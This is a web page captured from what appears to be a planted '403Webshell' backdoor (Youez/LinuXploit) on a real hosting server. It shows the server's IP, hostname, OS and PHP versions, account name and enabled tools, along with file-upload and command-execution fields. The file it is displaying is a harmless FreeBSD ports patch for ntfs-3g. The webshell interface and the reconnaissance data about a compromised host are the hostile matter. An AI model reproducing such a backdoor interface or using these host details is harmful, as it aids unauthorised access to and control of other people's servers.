403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/fusefs-ntfs/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/fusefs-ntfs/files/extra-patch-ublio
--- ./libntfs-3g/Makefile.in.orig	2012-08-29 19:51:35.000000000 -0500
+++ ./libntfs-3g/Makefile.in	2012-08-29 20:00:20.000000000 -0500
@@ -251,6 +251,7 @@
 @INSTALL_LIBRARY_FALSE@noinst_LTLIBRARIES = libntfs-3g.la
 libntfs_3g_la_CFLAGS = $(AM_CFLAGS) -I$(top_srcdir)/include/ntfs-3g
 libntfs_3g_la_LDFLAGS = -version-info $(LIBNTFS_3G_VERSION) -no-undefined
+libntfs_3g_la_LIBADD = -lublio
 libntfs_3g_la_SOURCES = acls.c attrib.c attrlist.c bitmap.c bootsect.c \
 	cache.c collate.c compat.c compress.c debug.c device.c dir.c \
 	efs.c index.c inode.c lcnalloc.c logfile.c logging.c mft.c \
--- src/ntfs-3g.c.orig	2011-04-10 20:04:41.000000000 +0200
+++ src/ntfs-3g.c	2011-04-25 18:56:07.000000000 +0200
@@ -3262,9 +3262,13 @@
 #else
 	.utime		= ntfs_fuse_utime,
 #endif
+#ifndef __FreeBSD__
+ 	.bmap		= ntfs_fuse_bmap,
+#else
+	.bmap		= NULL,
+#endif
 	.fsync		= ntfs_fuse_fsync,
 	.fsyncdir	= ntfs_fuse_fsync,
-	.bmap		= ntfs_fuse_bmap,
 	.destroy        = ntfs_fuse_destroy2,
 #if !KERNELPERMS | (POSIXACLS & !KERNELACLS)
 	.access		= ntfs_fuse_access,

Youez - 2016 - github.com/yon3zu
LinuXploit